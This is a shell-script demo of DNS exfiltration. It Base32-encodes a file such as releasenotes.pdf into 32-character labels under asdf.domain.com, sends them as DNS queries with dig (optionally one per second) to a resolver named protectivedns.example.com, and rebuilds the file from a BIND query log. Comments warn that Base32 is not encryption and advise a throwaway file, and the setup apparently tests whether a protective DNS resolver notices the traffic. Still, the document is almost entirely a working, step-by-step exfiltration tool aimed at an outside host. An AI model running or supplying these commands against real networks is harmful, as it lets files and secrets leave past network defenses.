DNS Exfiltration Demo

Guide: the commands below walk through the demo. Note that the Base32 step is an encoding, not encryption — the file's contents travel in cleartext inside the DNS query names and are visible to every resolver, log and packet capture on the path, so use a throwaway test file.

# Paths and names used by the demo. "ENCRYPTED"/"ENCRYPTED2" are historical
# names: those files hold Base32-encoded DNS names, which anyone who sees the
# queries can decode -- nothing in this demo is encrypted.
SOURCE="/home/name/dns_exfil_test/releasenotes.pdf"          # file to exfiltrate (use a throwaway file)
ENCRYPTED="/home/name/dns_exfil_test/encryptedpdf.txt"       # one DNS name per line, built from SOURCE
ENCRYPTED2="/home/name/dns_exfil_test/encryptedpdf2.txt"     # names recovered from the BIND query log
DOMAIN="domain.com"                                          # zone the queries are sent to
SUBDOM="asdf"                                                # label placed between the data chunk and DOMAIN
LOCALDNS="protectivedns.example.com"                         # resolver dig sends the queries to
BIND_LOG_FILE="/var/log/named/query.log"                     # BIND query log that is parsed afterwards
DECRYPTEDOUTPUT="/home/name/dns_exfil_test/releasenotes2.pdf" # reconstructed copy of SOURCE


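# Encode (NOT encrypt) SOURCE as Base32, drop base32's own line breaks, cut the
# stream into 32-character chunks and turn each chunk into a DNS name under
# SUBDOM.DOMAIN, one name per line in ENCRYPTED.
# Security notes for anyone reusing this:
#   - Base32 is a reversible encoding, not encryption: every resolver, log and
#     packet capture on the path can rebuild the file. Use a throwaway test
#     file, never real data.
#   - 32 characters stays under the 63-octet DNS label limit; the whole name
#     (chunk + SUBDOM + DOMAIN) must also stay under the 253-octet name limit.
#   - base32 pads the final chunk with '='. Check that this character survives
#     the resolver and the query log; if it is dropped, the last few bytes will
#     not decode.
# The suffix is handed to awk via -v so a '/' or '&' in SUBDOM/DOMAIN cannot
# break the expression the way it would inside an interpolated sed script.
base32 -- "$SOURCE" | tr -d '\n' | fold -w 32 \
  | awk -v suffix=".$SUBDOM.$DOMAIN" '{ print $0 suffix }' > "$ENCRYPTED"

# Resolve every name in ENCRYPTED through LOCALDNS. The answers do not matter;
# the query names carry the data. dig retries a timed-out query (default
# +tries=3) and each retry is logged again on the server, which duplicates that
# chunk when the log is decoded -- keep this in mind if the decoded file is
# corrupt.
dig +short A @"$LOCALDNS" -f "$ENCRYPTED"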

Or, throttled to one query per second:

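# Same as the dig -f form above, but one query per second. The name list is
# read line by line (no word-splitting or globbing of the file contents, and
# a final line without a trailing newline is still sent); if ENCRYPTED cannot
# be opened the loop body does not run at all.
while IFS= read -r qname || [ -n "$qname" ]; do
  dig +short A @"$LOCALDNS" "$qname"
  sleep 1
done < "$ENCRYPTED"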



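# Pull the queried names for SUBDOM.DOMAIN back out of the BIND query log.
# This assumes the default BIND 9 query-log line layout
#   <date> <time> queries: info: client @0x... <ip>#<port> (<qname>): query: ...
# where the 8th whitespace-separated field is "(<qname>):" -- adjust the field
# number if your logging channel omits the time/category/severity prefix.
# The ".SUBDOM.DOMAIN" suffix is stripped so only the Base32 chunk remains; if
# it is left in place, base32 --decode rejects the '.' and lowercase letters as
# invalid input. If your log shows the names lowercased, add "tr a-z A-Z"
# before decoding, since the Base32 alphabet is uppercase only.
# Caveats: the log order is assumed to equal the send order, and a retried or
# retransmitted query yields a duplicated chunk -- both silently corrupt the
# decoded file. On a shared resolver also filter on the client address
# (field 7 in the layout above) so another host's queries are not mixed in.
grep -F -- ".$SUBDOM.$DOMAIN" "$BIND_LOG_FILE" \
  | awk '{ n = $8; sub(/^\(/, "", n); sub(/\):$/, "", n); print n }' \
  | while IFS= read -r qname; do
      printf '%s\n' "${qname%".$SUBDOM.$DOMAIN"}"
    done > "$ENCRYPTED2"

# Join the chunks back into one Base32 stream and decode it into the
# reconstructed file.
tr -d '\n' < "$ENCRYPTED2" | base32 --decode > "$DECRYPTEDOUTPUT"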